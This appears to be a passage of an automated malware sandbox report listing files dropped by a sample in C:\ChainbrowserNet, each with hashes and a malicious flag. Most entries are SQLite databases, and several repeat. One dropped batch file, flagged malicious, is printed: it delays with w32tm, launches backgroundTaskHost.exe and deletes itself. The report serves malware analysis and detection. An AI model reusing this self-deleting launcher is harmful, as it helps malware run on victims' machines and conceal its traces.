                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                          Category:dropped
                                                                                          Size (bytes):28672
                                                                                          Entropy (8bit):2.5793180405395284
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):217
                                                                                          Entropy (8bit):5.200067388699201
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:hCijTg3Nou1SV+DEoDH0lHFKOZG1wkn23ft3n:HTg9uYDEGwH1fFn
                                                                                          MD5:E7E0DE7616F5FCAB418E5226757A8839
                                                                                          SHA1:E6D8644F49785F1A4BF58554F75BF4184D6C61F7
                                                                                          SHA-256:EA87C43CF7DEEAC8A90D18C97112880361F797B61EA59EA77884945CC45F638E
                                                                                          SHA-512:B4FB42A5DEECEB877257BD9A7B253FFD3FF151ADEBF61EBDB9BE6763AE609E09C47B76E0FF39BC5FB9604496412FDB584CB2C159E59C15C2B3FCB1735759685E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ChainbrowserNet\backgroundTaskHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ff39zMQKS5.bat"
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5712781801655107
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
